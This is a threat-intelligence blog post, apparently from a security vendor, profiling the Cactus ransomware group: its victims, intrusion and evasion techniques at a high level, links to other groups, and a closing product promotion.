Who is behind Cactus ransomware?

Cactus ransomware doesn't get enough attention. This threat group doesn’t have the longevity of LockBit or the resources of Volt Typhoon, but it certainly makes the most of what it does have. In the twelve months since Cactus was first observed attacking large commercial entities, this threat actor has successfully attacked some of the largest companies in the United States, Italy, the United Kingdom, Switzerland, and France.

Who and what is Cactus ransomware?

Cactus ransomware has been attacking commercial entities since March 2023, and so far it has been very successful by criminal standards. In one study on the growth of ransomware, the SANS Institute tracked Cactus as one of the fastest-growing threat actors of that year. This study also found that 17% of all ransomware attacks in 2023 were conducted by new groups that did not exist in 2022. Cactus was one of the top five threats in this new group of threat actors.

The group name comes from the filename of the ransom note, “cAcTuS.readme.txt”. Encrypted files are renamed with the extension .CTSx, where x is a single-digit number that varies between attacks.

The ransom note reads as follows:

###

Your corporate network was compromised and encrypted by Cactus.

Do not interrupt the encryption process, don't stop or reboot your machines until the encryption is

complete. Otherwise the data may be corrupted.

In addition to the encrypted infrastructure, we have downloaded a lot of confidential information from

your systems. The publication of these documents may cause the termination of your commercial

activities, contracts With your clients and partners, and multiple lawsuits.

If you ignore this warning and do not contact us, your sensitive data will be posted on our blog:

###

The remaining text has been redacted. You can see the full note here.

Cactus is your typical double-extortion, Ransomware-as-a-Service (RaaS) operation. The operators have demonstrated the ability to spin up new attacks very quickly, especially in response to new CVEs. This group is an evolving and challenging threat to cybersecurity teams.

Notable attacks

Cactus has been in the headlines lately for its successful attack on Schneider Electric in January 2024. Schneider Electric is a French multinational company with hundreds of office locations around the world, including several in the United States.  The company has thousands of enterprise clients and an Energy & Power market share of 35.7%. Only the Sustainability Business division was compromised in the incident, but that division’s customers include Clorox, DHL, DuPont, Hilton, PepsiCo, and Walmart. Cactus claims to have pulled 1.5TB of Schneider’s data before launching the ransomware.

Schneider Electric was also one of the thousands of companies affected by the MOVEit data breach in 2023.

Cactus has had several other global victims, including Marfrig Global Foods and MINEMAN Systems. Both companies impact worldwide supply chains. Cactus has listed over 100 victims on its leak site, but we don’t know how many other victims have paid a ransom and remain unlisted. 

Characteristics

This group is known for breaking into networks by exploiting known vulnerabilities in VPN appliances and Qlik Sense software.  The group also conducts phishing attacks, buys stolen credentials through crime forums, and partners with malware distributors. Microsoft Threat Intelligence observed threat actor Storm-0216 using malvertising and a backdoor trojan to deploy Cactus ransomware. 

The Microsoft thread on X has more details of this attack.

Ransomware relies on one or more encryption binaries to encrypt the files in a system. These binaries are normally executed when the criminals are done learning about the victim, stealing data, and doing whatever else they want in that system. Cactus ransomware is unique in that it will encrypt its own encryption binary so security tools do not recognize it. Once encrypted, the binary cannot be launched unless the decryption key is available. This type of sophistication requires potential victims to employ advanced security capabilities and a multi-layered approach to threat detection and mitigation.

That aside, Cactus ransomware isn’t that fancy. They use off-the-shelf scanners to scan targets for known vulnerabilities. Once inside a network, Cactus uses Living-off-the-Land (LotL) tactics to explore the system and stay hidden. The group uses Rclone for data exfiltration, a PowerShell script to automate the encryption process, and Scheduled Tasks to decrypt the binary. They’ll also drop an SSH backdoor on the system to establish persistence and communication with the command-and-control (C2) servers. When they’re ready, they’ll use the TotalExec.ps1 script to launch encryption.

Relationships to other threats

Not much is known about Cactus, but the operators appear to be skilled and experienced. The TotalExec.ps1 script used by Cactus was being used by the Black Basta group in 2022. Black Basta threat actors have been linked to Conti, BlackMatter, and Storm-0216. The Storm-0216 threat actor is the main character in the malvertising attack mentioned earlier.

The Cactus Tactics, Techniques and Procedures (TTPs) are similar to those of Magnet Goblin, but researchers haven’t yet confirmed a connection between them.

Protect your company

Cactus ransomware is an interesting and dangerous player among ransomware gangs. The binary encryption and LotL techniques are designed to hide from all but the most advanced threat protection.  

Barracuda offers complete ransomware protection and the industry’s most comprehensive cybersecurity platform. Visit our website to see how we defend email, network, applications, and data.